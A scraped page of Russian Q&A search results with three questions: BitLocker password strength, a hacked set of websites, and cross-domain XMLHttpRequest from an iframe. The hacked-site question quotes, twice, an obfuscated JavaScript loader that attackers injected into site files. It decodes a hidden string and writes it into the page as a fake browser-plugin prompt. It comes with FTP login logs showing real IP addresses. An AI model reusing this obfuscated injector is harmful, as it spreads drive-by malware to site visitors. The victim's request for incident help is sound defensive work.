Результаты поиска
Найдено результатов: 4
Насколько эффективно использование BitLocker для полного шифрования диска? Нужен ли сложный пароль?
Система
Ноутбук с установленной Windows 7 Ultimate и, соответственно, возможностью включить полное шифрование диска. При этом, как известно, создается (если по какой-либо причине не был создан при установке) новый раздел объемом примерно 200 Mb, на котором система хранит некоторый набор системных файлов, необходимых для запуска Windows — данный раздел не шифруется.
Ключ шифрования хранится в TPM-чипе. Если в ноутбуке отсутствует TPM-чип, используется метод загрузки со вставленным usb-flash, на котором хранится ключ шифрования.
Способ загрузки ключа шифрования с флэшки кажется даже безопаснее, т.к. без флэшки Windows откажется загружаться в принципе.
Вопрос: Необходимо ли ставить сложный пароль на вход в Windows?
Как я понимаю, все данные шифруются с использованием файла-ключа и пароля на вход в систему. Что будет, если загрузится с одного из многочисленных дисков для сброса пароля и сбросить пароль? Как я понимаю, данные будут безвозвратно утеряны, ну или как минимум недоступны с новым паролем.
Соответственно, при условии что пароль не настолько легкий, чтобы его можно было вручную подобрать в log on screen, то вроде бы можно не заботиться о его сложности и длине.
Однако, как я понимаю, т.к. Windows не расшифровывает зашифрованные данные до ввода пароля, то очевидно файл с хэшем пароля хранится на незашифрованном разделе. Соответственно его можно скопировать и дальше уже как обычно взламывать пароль подбором. В таком случае, к сложности пароля стоит относится как обычно — с должным вниманием.
Не смог найти документацию о том, как же технически работает BitLocker, поэтому спрашиваю, не знает ли кто, прав ли я в своих рассуждения и догадках.
Спасет ли относительно легкий, но поддающийся брут форсу пароль при использовании BitLocker для полного шифрования всех дисков, включая системный?
Взлом сайтов. Вставлен произвольный код?
Добрый день!
На днях на нескольких сайтах на CodeIgniter, одном на Joomla, одном на Wordpress и на одном совсем без CMS был установлен произвольный код в файлах index.*, home.*, page.*, auth.*. Т.е. в каждый из файлов был установлен тег script с произвольным кодом. Внешне это отображалось как приглашение установить новую мультимедийную плюшку для браузера.
Собственно, сам скрипт (без! знака в слове script и без переводов строки — не умещался):
<pre><code class="javascript"><sc!ript type="text/javascript" language="javascript">
wkllp="33933333339999333999339939993933
399993393993993339933939339333333999393339999339399933333
993393933999939339333933999393339933939399993333999393333
939999399333993999339939993399339333933399999333933399399
939333993393939993339399339333993939933933333399993993999
399939939339399339333999393339939333339993933393333333993
333399933333999933333999399399393333993393939939339399339
993993933339993933339993933393333333993333399933333999933
333999399399339933999339339933339399399393993393939933393
399399993999339339933933399339393999339333999393339333333
993999339939999339993993999399339939339399933993993933939
933393399393393993993339939339399939333999933933999393339
333333993933339939339399339333993393339933939399399933399
939939999939339999333393999939993399399939333999933939939
933399339393399999333999933399393393993399339993393399333
393993993939933939339333333993933939933933339999393393339
339993933399339393999333939933933399393993393339333933333
399933993999339339933399339999393393339339939333399939333
999393339993333339993933393999933939999399339933999399939
993339399933393999399939933939399339393999339339933999339
933993393999339933399399399993393999339933399399333993393
999939933339399339333393999339939393399933333993399933933
393339999933399993333939999399393393993399339993393399333
39399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";
vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 &&
gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";
imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){
bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(
wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;
qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;}</sc!ript>
Прямой связи CI-Joomla-WP-чистыйHTML я не вижу. Т.е. видимо, это не критическая уязвимость в каком-либо движке.
В логах апача странных запросов или даже каких-либо запросов во время модификации файла нет (+-10минут).
Подозрительно выглядят логи auth.log (настоящий username изменен; ip, с которого пришел запрос — нет):
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - USER user: no such user found from dslb-094-222-057-074.pools.arcor-ip.net [::ffff:94.222.57.74] to ::ffff:89.108.126.42:21 <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
<br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster1: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster2: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.
SSH закрыт фаерволом для всех, кроме меня.
Хочу задать вопрос — что это может быть? Как этого избежать? Какие еще логи нужны для анализа?
<pre><code class="javascript"><sc!ript type="text/javascript" language="javascript">
wkllp="33933333339999333999339939993933
399993393993993339933939339333333999393339999339399933333
993393933999939339333933999393339933939399993333999393333
939999399333993999339939993399339333933399999333933399399
939333993393939993339399339333993939933933333399993993999
399939939339399339333999393339939333339993933393333333993
333399933333999933333999399399393333993393939939339399339
993993933339993933339993933393333333993333399933333999933
333999399399339933999339339933339399399393993393939933393
399399993999339339933933399339393999339333999393339333333
993999339939999339993993999399339939339399933993993933939
933393399393393993993339939339399939333999933933999393339
333333993933339939339399339333993393339933939399399933399
939939999939339999333393999939993399399939333999933939939
933399339393399999333999933399393393993399339993393399333
393993993939933939339333333993933939933933339999393393339
339993933399339393999333939933933399393993393339333933333
399933993999339339933399339999393393339339939333399939333
999393339993333339993933393999933939999399339933999399939
993339399933393999399939933939399339393999339339933999339
933993393999339933399399399993393999339933399399333993393
999939933339399339333393999339939393399933333993399933933
393339999933399993333939999399393393993399339993393399333
39399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";
vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 &&
gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";
imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){
bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(
wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;
qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;}</sc!ript>Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - USER user: no such user found from dslb-094-222-057-074.pools.arcor-ip.net [::ffff:94.222.57.74] to ::ffff:89.108.126.42:21 <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
Jan 31 08:38:45 User proftpd[12006]: Serv (dslb-094-222-057-074.pools.arcor-ip.net[::ffff:94.222.57.74]) - SECURITY VIOLATION: root login attempted. <br/>
<br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster1: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - USER webmaster2: Login successful. <br/>
Feb 1 10:56:40 User proftpd[19762]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed. <br/>
Feb 1 10:56:40 User proftpd[19764]: Serv (::ffff:193.85.168.74[::ffff:193.85.168.74]) - FTP session closed.
Cross Domain XmlHttpRequest
Добрый день, друзья.
Целый день сегодня мучаюсь с вышеозначенной темой. Изначальная задача:
Выполняясь на site.com отправить POST запрос (даже ответ не обязательно получать) на xxx.site.com. В крайнем случае готов ограничиться браузером Google Chrome.
Казалось бы, задача уже не нова, написана куча материалов на тему, но что-то ничего не срабатывает…
Итак, что я уже попробовал:
- подменить document.domain перед отправкой. Как оказалось, менять с xxx.site.com на site.com можно, а вот обратно — никак...
- создать iframe с src=«xxx.site.com», а затем внутри него добавить в дом модель тег script, который будет содержать в себе логику по отправлению XmlHttpRequest. И вот этот вариант уже почти-почти сработал, как по непонятным мне причинам xhr.readystatechange вызывается один раз и readyState=1… Код примерно такой:
var iframe = $('<iframe src=«xxx.site.com» style=«display:none;»></iframe>').appendTo(document.body);
var iDoc = iframe.get(0).contentDocument;
var script = iDoc.createElement(«script»);
script.setAttribute(«type», «text/javascript»);
script.innerHTML =
«function postIt() {» +
«var xhr = new XMLHttpRequest();» +
«xhr.onreadystatechange = function(data) {» +
«alert(xhr.readyState);» +
«if (xhr.readyState == 4) {» +
" if (xhr.status == 200) {" +
" alert(data.toString());" +
" } else {" +
" alert(xhr.error);" +
" }" +
"}};" +
«var url = \»xxx.site.com\";" +
«var postParams = \»a=1&b=1\"" +
«xhr.open(\»POST\", url, true);" +
«xhr.setRequestHeader(\»Content-Type\", \«application/x-www-form-urlencoded;\»);" +
«xhr.send(postParams);» +
"}" +
«postIt();»;
iDoc.body.appendChild(script);
* This source code was highlighted with Source Code Highlighter.
- Также рассмотрел способ с YQL — не подошло
Какие есть еще идеи как это побороть?
var iframe = $('<iframe src=«xxx.site.com» style=«display:none;»></iframe>').appendTo(document.body);
var iDoc = iframe.get(0).contentDocument;
var script = iDoc.createElement(«script»);
script.setAttribute(«type», «text/javascript»);
script.innerHTML =
«function postIt() {» +
«var xhr = new XMLHttpRequest();» +
«xhr.onreadystatechange = function(data) {» +
«alert(xhr.readyState);» +
«if (xhr.readyState == 4) {» +
" if (xhr.status == 200) {" +
" alert(data.toString());" +
" } else {" +
" alert(xhr.error);" +
" }" +
"}};" +
«var url = \»xxx.site.com\";" +
«var postParams = \»a=1&b=1\"" +
«xhr.open(\»POST\", url, true);" +
«xhr.setRequestHeader(\»Content-Type\", \«application/x-www-form-urlencoded;\»);" +
«xhr.send(postParams);» +
"}" +
«postIt();»;
iDoc.body.appendChild(script);
* This source code was highlighted with Source Code Highlighter.